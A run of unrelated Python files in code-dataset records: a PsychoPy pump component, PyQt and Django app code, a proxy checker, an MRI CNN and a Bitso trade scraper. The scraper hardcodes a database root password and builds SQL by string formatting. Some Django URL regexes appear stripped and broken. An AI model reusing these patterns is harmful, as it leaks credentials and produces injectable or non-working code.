self.params['saveStats'] = Param(\n saveStats, categ='Basic',\n valType='bool', inputType=\"bool\",\n hint=_translate('Save log to txt file'),\n label=_localized['saveStats'])\n\n self.params['stopVal'] = Param(\n ((((pulseDuration * numberOfPulses + delayBetweenPulses) *\n (numberOfPulses - 1)) * numberOfSequences) +\n (delayBetweenSeq * (numberOfSequences - 1))),\n categ='Basic', valType='num', inputType=\"single\",\n hint=_translate('The duration of the pulse sent to the peristaltic pump'),\n label=_localized['stopVal'])\n \n self.params['com_port'] = Param(\n com_port, valType='str', inputType=\"choice\", categ='Basic',\n allowedVals=[p.device for p in serial.tools.list_ports.comports()],\n updates='constant',\n hint=_translate(\"COM port\"),\n label=_localized['com_port'])\n\n\n def writeInitCode(self, buff):\n \n \"\"\"Write variable initialisation code.\"\"\"\n code = (\"%(name)s = event.Mouse(win=win)\\n\")\n code += (\"pulse_dur = %(pulseDuration)s\\n\")\n code+= (\"number_pulses = %(numberOfPulses)s\\n\")\n code+= (\"delay_sequences = 
%(delayBetweenSeq)s\\n\")\n code+= (\"number_sequences = %(numberOfSequences)s\\n\")\n code+= (\"delay_pulses = %(delayBetweenPulses)s\\n\")\n code+= (\"saveStats = %(saveStats)s\\n\")\n code+= (\"import psychopy\\n\")\n code+= (\"import serial\\n\")\n code+= (\"import time\\n\")\n code+=(\"from datetime import datetime\\n\")\n code+= (\"pump = serial.Serial(port=%(com_port)s, baudrate=115200, timeout=.1)\\n\")\n code+= (\"pulse_started = False\\n\")\n code+= (\"reward_start = %(startVal)s\\n\")\n code+=(\"n=0\\n\")\n code+=(\"ns=0\\n\")\n code+=(\"tp0=0\\n\")\n code+=(\"td0=0\\n\")\n code+=(\"ts0=0\\n\")\n code+=(\"firstFrame = False\\n\")\n code+=(\"pause = False\\n\")\n code+=(\"\"\"expInfo = {'participant': '', 'session': '001'}\\n\"\"\")\n code+=(\"\"\"expInfo['date'] = data.getDateStr()\\n\"\"\")\n buff.writeIndented(code % self.params)\n code=(\"\"\"filename_pump = _thisDir + os.sep + u'data/%s_pump_%s' % (expInfo['participant'], expInfo['date'])\\n\"\"\")\n buff.writeIndented(code)\n code=(\"\"\"text_file_pump = open(filename_pump + '.txt', 'w')\\n\"\"\")\n buff.writeIndented(code)\n\n\n def writeRoutineStartCode(self, buff):\n \"\"\"Write the code that will be called at the start of the routine.\"\"\"\n pass\n\n def writeFrameCode(self, buff):\n \n buff.writeIndented(\"if pump.inWaiting():\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"lick_state = pump.readline()\\n\")\n buff.writeIndented(\"\"\"if lick_state == b'l\\\\r\\\\n':\\n\"\"\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"try:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"if behavioral_sys == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"behavioral_sys = True\\n\")\n buff.setIndentLevel(-2, relative=True)\n buff.writeIndented(\"except:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': lick')\\n\"\"\")\n buff.writeIndented(\"if saveStats == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"text_file_pump.write(str(round(t,2)) + 'lick')\\n\"\"\")\n #code+=(\"\"\" lick_state = b''\\n\"\"\")\n buff.setIndentLevel(-4, relative=True)\n \n buff.writeIndented(\"if t>= %(startVal)s and %(name)s.status != FINISHED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"%(name)s.status = STARTED\\n\" % self.params)\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"if firstFrame == False and %(name)s.status == STARTED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n\n buff.writeIndented(\"firstFrame = True\\n\")\n buff.writeIndented(\"tp0 = time.time()\\n\")\n buff.writeIndented(\"td=0\\n\")\n buff.writeIndented(\"td0=time.time()\\n\")\n buff.writeIndented(\"ts0=time.time()\\n\")\n buff.writeIndented(\"ts=0\\n\")\n buff.writeIndented(\"\"\"pump.write(bytes('o', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump ON')\\n\"\"\")\n buff.writeIndented(\"pulse_started = True\\n\")\n\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"tp = time.time() - tp0\\n\")\n buff.writeIndented(\"ts = time.time() - ts0\\n\")\n buff.writeIndented(\"if tp>= pulse_dur and pulse_started == True and pause == False and firstFrame == True and %(name)s.status == STARTED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"pump.write(bytes('f', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump OFF')\\n\"\"\")\n 
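# NOTE: in the generated script below, tp, td and ts act as elapsed-time\n        # counters (since pulse start, since the last pulse end, and since a sequence\n        # pause began); the serial bytes 'o' and 'f' switch the pump on and off.\n        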
buff.writeIndented(\"pulse_started = False\\n\")\n buff.writeIndented(\"n+=1\\n\")\n buff.writeIndented(\"td0 = time.time()\\n\")\n\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"td = time.time() - td0\\n\")\n buff.writeIndented(\"if td >= delay_pulses and pulse_started == False and pause == False and firstFrame == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"pulse_started = True\\n\")\n buff.writeIndented(\"if not n >= number_pulses :\\n\")\n buff.setIndentLevel(1, relative=True)\n\n buff.writeIndented(\"\"\"pump.write(bytes('o', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump ON')\\n\"\"\")\n buff.writeIndented(\"pulse_started = True\\n\")\n buff.writeIndented(\"tp0 = time.time()\\n\")\n buff.setIndentLevel(-2, relative=True)\n buff.writeIndented(\"if n == number_pulses and %(name)s.status == STARTED and pause == False:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"\"\"pump.write(bytes('f', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"ts0 = time.time()\\n\")\n buff.writeIndented(\"pause=True\\n\")\n buff.writeIndented(\"ns+=1\\n\")\n buff.writeIndented(\"n=0\\n\")\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"if ns == number_sequences and %(name)s.status == STARTED:\\n\" % self.params)\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"pump.write(bytes('f', 'utf-8'))\\n\")\n buff.writeIndented(\"%(name)s.status = FINISHED\\n\" % self.params)\n buff.setIndentLevel(-1, relative=True)\n buff.writeIndented(\"ts = time.time()-ts0\\n\")\n buff.writeIndented(\"if ts >= delay_sequences and pause == True and firstFrame == True:\\n\")\n buff.setIndentLevel(1, relative=True)\n buff.writeIndented(\"pause=False\\n\")\n buff.writeIndented(\"pulse_started = True\\n\")\n buff.writeIndented(\"\"\"pump.write(bytes('o', 'utf-8'))\\n\"\"\")\n buff.writeIndented(\"\"\"print(str(round(t,2)) + ': pump ON')\\n\"\"\")\n buff.writeIndented(\"tp0 = time.time()\\n\")\n \n buff.setIndentLevel(-1, relative=True)\n\n def writeRoutineEndCode(self, buff):\n buff.writeIndented(\"%(name)s.status = 0\\n\" % self.params)\n buff.writeIndented(\"ns = 0\\n\")\n buff.writeIndented(\"n = 0\\n\")\n buff.writeIndented(\"firstFrame = False\\n\")\n buff.writeIndented(\"pause = False\\n\")\n\n\n def writeExperimentEndCode(self, buff):\n pass","repo_name":"psychopy/versions","sub_path":"psychopy/experiment/components/peristalticPump/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11049,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"36269373505","text":"def convertBeSangDoc(Num: str):\n \"\"\"\n Chuyển dãy số Num về cách bé Sang đọc\n :param Num: xâu gồm các chữ số\n :return: xâu là cách bé Sang đọc\n \"\"\"\n res = \"\"\n cnt = 1\n for index in range(1, len(Num)):\n if Num[index] != Num[index - 1]:\n res += str(cnt) + str(Num[index-1])\n cnt = 1\n else:\n cnt = cnt + 1\n res += str(cnt) + str(Num[-1])\n return res\n\n\nStr, n = input().split()\nfor i in range(int(n)):\n Str = convertBeSangDoc(Str)\n print(Str)\n","repo_name":"mfnintd/Python_HIT","sub_path":"Buoi5_Kiemtra/Bai4.py","file_name":"Bai4.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9243484113","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import QMessageBox\nfrom 
Services.EquipementServices import getEquipements,deleteEquipement\nfrom .Equipement import Ui_Dialog as Equipement_UI\nfrom .EquipementModify import Ui_Dialog as Equipement_Modif_UI\nclass Ui_Dialog(object):\n def setColortoRow(self,table, rowIndex, color):\n for j in range(table.columnCount()):\n table.item(rowIndex, j).setBackground(color)\n def getSelectedRow(self):\n rows=[]\n for row in range(self.tableWidgetEquipement.rowCount()):\n if self.tableWidgetEquipement.item(row,0).checkState()==QtCore.Qt.CheckState.Checked:\n rows.append(self.tableWidgetEquipement.item(row,0).text())\n return rows\n def modifierEquipement(self):\n ids=self.getSelectedRow()\n if len(ids)>1:\n self.showDialog(\"Error\",\"Impossible d'effectuer cette action sur plus d'une ligne\",False)\n return \n if len(ids)<1:\n self.showDialog(\"Error\",\"Il faut selectionner une ligne\",False)\n return \n self.RedirectEquipementModify(ids[0])\n def RedirectEquipementModify(self,id):\n self.dialogEquipement = QtWidgets.QDialog()\n self.uiEquipement = Equipement_Modif_UI(self.mainWindowSelf,id,self.dialogEquipementList,self)\n self.uiEquipement.setupUi(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.addWidget(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.setCurrentWidget(self.dialogEquipement)\n def supprimerEquipement(self):\n ids=self.getSelectedRow()\n if len(ids)<1:\n self.showDialog(\"Error\",\"Il faut selectionner au moins une ligne\",False)\n return \n deleteEquipement(ids)\n self.fetchRows()\n def fetchRows(self):\n status,record = getEquipements()\n if status :\n self.tableWidgetEquipement.setColumnCount(6)\n self.tableWidgetEquipement.setHorizontalHeaderLabels([\"Reference\",\"Designation\",\"Role\",\"Fabriquant\",\"DateFabriquation\",\"DateMiseEnMarche\"])\n self.tableWidgetEquipement.setRowCount(len(record))\n\n self.horizontal_header = self.tableWidgetEquipement.horizontalHeader() \n self.horizontal_header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n self.horizontal_header.setSectionResizeMode(1, QtWidgets.QHeaderView.Stretch)\n self.horizontal_header.setSectionResizeMode(2, QtWidgets.QHeaderView.Stretch)\n self.horizontal_header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)\n self.horizontal_header.setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)\n self.horizontal_header.setSectionResizeMode(5, QtWidgets.QHeaderView.ResizeToContents)\n for row in range(len(record)):\n for col in range(6):\n item=QtWidgets.QTableWidgetItem(str(record[row][col]))\n self.tableWidgetEquipement.setItem(row,col,item)\n if col ==0:\n item.setFlags(QtCore.Qt.ItemFlag.ItemIsUserCheckable | QtCore.Qt.ItemFlag.ItemIsEnabled)\n item.setCheckState(QtCore.Qt.CheckState.Unchecked)\n self.setColortoRow(self.tableWidgetEquipement,row,QColor(202,225,183)) \n def showDialog(self,title,str,bool):\n msgBox = QMessageBox()\n if bool==False:\n msgBox.setIcon(QMessageBox.Warning)\n else:\n msgBox.setIcon(QMessageBox.Information)\n msgBox.setText(str)\n msgBox.setWindowTitle(title)\n msgBox.setStandardButtons(QMessageBox.Ok)\n msgBox.exec()\n def RedirectEquipement(self):\n self.dialogEquipement = QtWidgets.QDialog()\n self.uiEquipement = Equipement_UI(self.mainWindowSelf)\n self.uiEquipement.setupUi(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.addWidget(self.dialogEquipement)\n self.mainWindowSelf.stackedWidget.setCurrentWidget(self.dialogEquipement)\n def __init__(self,mainWindowSelf,dialogEquipementList) -> None:\n self.mainWindowSelf=mainWindowSelf\n 
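# references kept for the Redirect* helpers above, which stack new dialogs on\n        # mainWindowSelf.stackedWidget (dialogEquipementList is presumably passed on\n        # so the modify dialog can come back to and refresh this list)\n        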
self.dialogEquipementList=dialogEquipementList\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(1018, 810)\n self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.frame_2 = QtWidgets.QFrame(Dialog)\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame_2)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.label_2 = QtWidgets.QLabel(self.frame_2)\n self.label_2.setAutoFillBackground(False)\n self.label_2.setText(\"\")\n self.label_2.setPixmap(QtGui.QPixmap(\":/icons/icons/service.png\"))\n self.label_2.setAlignment(QtCore.Qt.AlignCenter)\n self.label_2.setWordWrap(False)\n self.label_2.setOpenExternalLinks(True)\n self.label_2.setObjectName(\"label_2\")\n self.horizontalLayout.addWidget(self.label_2)\n self.frame_3 = QtWidgets.QFrame(self.frame_2)\n self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_3.setObjectName(\"frame_3\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame_3)\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.textEdit = QtWidgets.QTextEdit(self.frame_3)\n self.textEdit.setStyleSheet(\"background-color:transparent;\\n\"\n\"border : none;\")\n self.textEdit.setReadOnly(True)\n self.textEdit.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)\n self.textEdit.setObjectName(\"textEdit\")\n self.verticalLayout_2.addWidget(self.textEdit)\n self.ButtonCreerEquipement = QtWidgets.QPushButton(self.frame_3)\n self.ButtonCreerEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.ButtonCreerEquipement.setStyleSheet(\"QPushButton{\\n\"\n\"height : 25px;\\n\"\n\"background-color :#00A8E8;\\n\"\n\"}\\n\"\n\"\\n\"\n\"\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"};\")\n self.ButtonCreerEquipement.setObjectName(\"ButtonCreerEquipement\")\n self.verticalLayout_2.addWidget(self.ButtonCreerEquipement)\n self.horizontalLayout.addWidget(self.frame_3)\n self.horizontalLayout.setStretch(0, 1)\n self.horizontalLayout.setStretch(1, 2)\n self.verticalLayout.addWidget(self.frame_2)\n self.frame = QtWidgets.QFrame(Dialog)\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.frame)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.frame_4 = QtWidgets.QFrame(self.frame)\n self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_4.setObjectName(\"frame_4\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.frame_4)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.label = QtWidgets.QLabel(self.frame_4)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setObjectName(\"label\")\n self.horizontalLayout_2.addWidget(self.label)\n self.ButtonModifier = QtWidgets.QPushButton(self.frame_4)\n self.ButtonModifier.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.ButtonModifier.setStyleSheet(\"QPushButton{\\n\"\n\"height : 20px;\\n\"\n\"background-color 
:#00A8E8;\\n\"\n\"}\\n\"\n\"\\n\"\n\"\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"};\")\n self.ButtonModifier.setObjectName(\"ButtonModifier\")\n self.horizontalLayout_2.addWidget(self.ButtonModifier)\n self.ButtonSupprimer = QtWidgets.QPushButton(self.frame_4)\n self.ButtonSupprimer.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.ButtonSupprimer.setStyleSheet(\"QPushButton{\\n\"\n\"height : 20px;\\n\"\n\"background-color :#00A8E8;\\n\"\n\"}\\n\"\n\"\\n\"\n\"\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"};\")\n self.ButtonSupprimer.setObjectName(\"ButtonSupprimer\")\n self.horizontalLayout_2.addWidget(self.ButtonSupprimer)\n self.verticalLayout_3.addWidget(self.frame_4)\n self.tableWidgetEquipement = QtWidgets.QTableWidget(self.frame)\n self.tableWidgetEquipement.setObjectName(\"tableWidgetEquipement\")\n self.tableWidgetEquipement.setColumnCount(0)\n self.tableWidgetEquipement.setRowCount(0)\n self.verticalLayout_3.addWidget(self.tableWidgetEquipement)\n self.verticalLayout.addWidget(self.frame)\n self.verticalLayout.setStretch(0, 1)\n self.verticalLayout.setStretch(1, 2)\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n self.fetchRows()\n \n self.ButtonModifier.clicked.connect(self.modifierEquipement)\n self.ButtonSupprimer.clicked.connect(self.supprimerEquipement)\n self.ButtonCreerEquipement.clicked.connect(self.RedirectEquipement)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.textEdit.setHtml(_translate(\"Dialog\", \"\\n\"\n\"\\n\"\n\"

Equipment is at the heart of any CMMS. Without equipment, you have nothing to run maintenance on! You can create assets individually or import them from a spreadsheet file.

\"))\n self.ButtonCreerEquipement.setText(_translate(\"Dialog\", \"Ajouter un Equipement\"))\n self.label.setText(_translate(\"Dialog\", \"Actions :\"))\n self.ButtonModifier.setText(_translate(\"Dialog\", \"Modifier\"))\n self.ButtonSupprimer.setText(_translate(\"Dialog\", \"Supprimer\"))\n","repo_name":"ahmedhamila/GMAO","sub_path":"Source/Views/EquipementViews/EquipementList.py","file_name":"EquipementList.py","file_ext":"py","file_size_in_byte":11101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10615136810","text":"import requests\nimport json \nimport logging\nimport argparse\n\nURL = 'http://httpbin.org/ip'\n\nclass ProxyChecker:\n \n def __init__(self, proxt_list_path: str=None) -> None:\n self.proxy_list_path = proxt_list_path\n \n def save_proxy(self, proxy):\n with open('working_proxies.txt', 'a') as fp:\n fp.write(f'{proxy}\\n')\n \n def _check_proxy(self, proxy, ip):\n return True if proxy == ip else False\n \n def check_proxy(self):\n \n if self.proxy_list_path == None:\n print(\"Proxy list cannot be None. Please specify the path of proxy list\")\n return \n \n try:\n with open(self.proxy_list_path, 'r') as fp:\n proxies = fp.read().split()\n \n except FileNotFoundError:\n print(\"Cannot find the proxy list. Please specify the correct path\")\n return \n\n # get through all proxies\n for proxy in proxies:\n \n _proxies = {\n 'http': f'http://{proxy}',\n 'https': f'https://{proxy}'\n }\n \n # send the request\n response = requests.get(URL, _proxies)\n # get the response\n data = json.loads(response.text)\n ip = data['origin']\n print(f'{ip} response for {proxy} proxy')\n # check if the response matches the specified proxy\n if self._check_proxy(ip, proxy.split(':')[0]):\n # - save the proxy\n print(f\"Working proxy found! - {proxy}\")\n self.save_proxy(proxy)\n\n # save logs\n logging.basicConfig(\n filename='logs.txt', \n filemode='a', \n format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n datefmt='%H:%M%S',\n level=logging.DEBUG)\n \nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(\n prog='proxy_checker.py',\n description='Checks working proxies'\n )\n \n parser.add_argument('path', help='Path to proxy list')\n args = parser.parse_args()\n proxy_checker = ProxyChecker(args.path)\n proxy_checker.check_proxy()\n","repo_name":"SarfarazMir/ProxyChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25685404421","text":"import sublime, sublime_plugin, os \n\nclass ModuleAutoCompleteCommand(sublime_plugin.EventListener):\n\tSCOPE_NAME = 'text.html.pp.module';\n\tMODULES_ROOT = '\\Content\\Modules';\n\n\tdef on_query_completions(self, view, prefix, locations):\n\t\tif self.SCOPE_NAME in view.scope_name(locations[0]):\n\t\t\tautocomplete_list = self.getDirs();\n\t\t\treturn autocomplete_list;\n\n\tdef getDirs(self):\n\t\tmodulesList = [];\n\t\tfolders = sublime.active_window().folders();\n\t\t# print (folders[0].lower().endswith('sites'))\n\t\tif folders[0].lower().endswith('sites'):\n\t\t\tfolders = get_immediate_subdirectories(self,folders[0])\n\t\tfor x in folders:\n\t\t\tif x.endswith('dev'):\n\t\t\t\tcontinue;\n\t\t\tfullPath = x+self.MODULES_ROOT;\n\t\t\tfor dir in os.listdir(fullPath):\n\t\t\t\tif '.' 
not in dir:\n\t\t\t\t\tfor fileName in os.listdir(fullPath+'\\\\'+dir):\n\t\t\t\t\t\tmPath = dir+'/'+os.path.splitext(fileName)[0];\n\t\t\t\t\t\tif '.' not in mPath:\n\t\t\t\t\t\t\tmodulesList.append([mPath,mPath]);\n\t\treturn modulesList;\ndef get_immediate_subdirectories(self, a_dir):\n return [a_dir+'\\\\'+name for name in os.listdir(a_dir)\n if os.path.isdir(os.path.join(a_dir, name))]\n\t\n\t\t","repo_name":"yoavdooble/sublime-dooble","sub_path":"ModuleAutoComplete.py","file_name":"ModuleAutoComplete.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"14484031995","text":"import nibabel as nib\n\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Conv3D, MaxPooling3D, Dropout, BatchNormalization\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\n\ntrainx = [(nib.load('./Training/health/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata()) for i in range(1,11)]\ntrainx2 = [nib.load('./Training/patient/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata() for i in range(1,11)]\ntrainx.extend(trainx2)\ntrainx = np.array(trainx)\ntrainy = [0 for i in range(0,10)]\ntrainy.extend([1 for i in range(0,10)])\ntestx = [nib.load('./Testing/health/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata() for i in range(1,6)]\ntestx2 = [nib.load('./Testing/patient/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata() for i in range(1,6)]\ntestx.extend(testx2)\ntestx = np.array(testx)\ntesty = [0 for i in range(0,5)]\ntesty.extend([1 for i in range(0,5)])\ntrainx = np.expand_dims(trainx, axis = 4)\ntestx = np.expand_dims(testx, axis = 4)\n\n# model\n# Create the model\nmodel = Sequential()\nmodel.add(Conv3D(32, kernel_size=(3, 3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=trainx[0].shape))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(BatchNormalization(center=True, scale=True))\nmodel.add(Dropout(0.5))\nmodel.add(Conv3D(64, kernel_size=(3, 3, 3), activation='relu', kernel_initializer='he_uniform'))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(BatchNormalization(center=True, scale=True))\nmodel.add(Dropout(0.5))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu', kernel_initializer='he_uniform'))\nmodel.add(Dense(256, activation='relu', kernel_initializer='he_uniform'))\nmodel.add(Dense(2, activation='softmax'))\n\n# Compile the model\nmodel.compile(loss='categorical_crossentropy',\n optimizer=keras.optimizers.Adam(lr=0.001),\n metrics=['accuracy'])\nmodel.summary()\n# Fit data to model\nhistory = model.fit(trainx, to_categorical(trainy),\n batch_size=3,\n epochs=10,\n verbose=1,\n validation_split=0.3)","repo_name":"flynsequeira/fmri-research","sub_path":"6389_project1/maxmodel.py","file_name":"maxmodel.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73453556004","text":"import os\nfrom workflow.task import Task\nfrom workflow.utils.ansible import Ansible\nfrom workflow.utils import env as ENV\nfrom kratos.apps.service.models import Service\n\nclass ServiceStop(Task):\n def __init__(self, *args, **kwargs):\n self.deploy_apth = kwargs.get('deploy_path')\n self.app_version = ENV.GET('app_version', kwargs.get('app_version'))\n self.cmd = kwargs.get('cmd')\n self.logger = ENV.GET('logger')\n\n def info(self):\n self.logger.info('TaskName=ServiceStop')\n\n def 
exec(self):\n        self.info()\n\n        # fetch the service records\n        services = Service.objects.filter(app_id=ENV.GET('app_id'), app_version=self.app_version)\n\n        # initialize Ansible\n        ansible = Ansible(servers=[service.server.id for service in services], connection='smart', become=True, become_method='sudo')\n\n        # run the stop command\n        self.logger.info('Running stop command...')\n        ansible.run(\n            module='shell',\n            args=self.cmd\n        )\n\n        # remove the application symlink\n        self.logger.info('Removing application symlink...')\n        ansible.run(\n            module='file',\n            args='path=%s state=absent' % self.deploy_apth\n        )\n\n        # collect the execution results\n        ansible.get_result()\n\n        # update the service records\n        services.update(status=2)\n\n        self.logger.info('Service stopped! Task finished!')\n","repo_name":"cipher-ops/backend-kts","sub_path":"workflow/tasks/ServiceStop.py","file_name":"ServiceStop.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11080891297","text":"import pandas as pd\nimport requests\nimport sqlalchemy as sql\nimport datetime\nimport time \n\n\ndef extract_bitso_api():\n\n    response = requests.get('https://api.bitso.com/v3/trades/?book=btc_mxn')\n    json_response = response.json()\n    datos = json_response['payload']\n    df = pd.DataFrame(datos)\n\n    engine = sql.create_engine('mysql+mysqlconnector://root:Flow#45180@localhost/bitso_api')\n\n    initial_q = ''' INSERT INTO bitso_trades\n                    (book, created_at, amount, maker_side, price, tid)\n                    VALUES \n                '''\n\n    values_q = \",\".join([\"\"\"('{}','{}','{}','{}','{}','{}')\"\"\".format(\n        row.book,\n        row.created_at,\n        row.amount,\n        row.maker_side,\n        row.price,\n        row.tid) for idx, row in df.iterrows()])\n\n    end_q = \"\"\" ON DUPLICATE KEY UPDATE \n                book = values(book),\n                created_at = values(created_at),\n                amount = values(amount),\n                maker_side = values(maker_side),\n                price = values(price),\n                tid = values(tid);\"\"\"\n\n    query = initial_q + values_q + end_q\n\n    engine.execute(query)\n    return None\n\nwhile True:\n    extract_bitso_api()\n    print(f\"Updating DB at {datetime.datetime.today()}\")\n    time.sleep(15)","repo_name":"rishells/trade","sub_path":"tradingAlgoritmico.py","file_name":"tradingAlgoritmico.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14234504732","text":"\"\"\"asteria URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom announcements.views import AnnouncementListView\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nimport challenges.views as challenge_views\nimport teams.views as team_views\n\nurlpatterns = [\n url('', include('django.contrib.auth.urls')),\n\n url(r'^$', AnnouncementListView .as_view(), name='announcements'),\n\n url(r'^admin/', admin.site.urls),\n\n url(r'^categories/$' , challenge_views.CategoryListView .as_view(), name='categories' ),\n url(r'^category/(?P[-\\w]+)/$' , challenge_views.CategoryDetailView .as_view(), name='category' ),\n url(r'^challenge/(?P[-\\w]+)/$', challenge_views.ChallengeDetailView.as_view(), name='challenge' ),\n url(r'^challenges/$' , challenge_views.ChallengeListView .as_view(), name='challenges' ),\n url(r'^level/(?P\\d{1,32})/$' , challenge_views.LevelDetailView .as_view(), name='level' ),\n url(r'^levels/$' , challenge_views.LevelListView .as_view(), name='levels' ),\n url(r'^reveal_hint/$' , challenge_views.reveal_hint , name='reveal_hint'),\n url(r'^submit_flag/$' , challenge_views.submit_flag , name='submit_flag'),\n\n url(r'^appoint_captain/$' , team_views.appoint_captain , name='appoint_captain' ),\n url(r'^change_team_name/$' , team_views.change_team_name , name='change_team_name' ),\n url(r'^change_team_password/$' , team_views.change_team_password , name='change_team_password'),\n url(r'^join_team/$' , team_views.join_team , name='join_team' ),\n url(r'^player/(?P[-\\w]+)$', team_views.PlayerView .as_view(), name='player' ),\n url(r'^promote_demote/$' , team_views.promote_demote , name='promote_demote' ),\n url(r'^register/$' , team_views.register , name='register' ),\n url(r'^scoreboard/$' , team_views.ScoreboardView 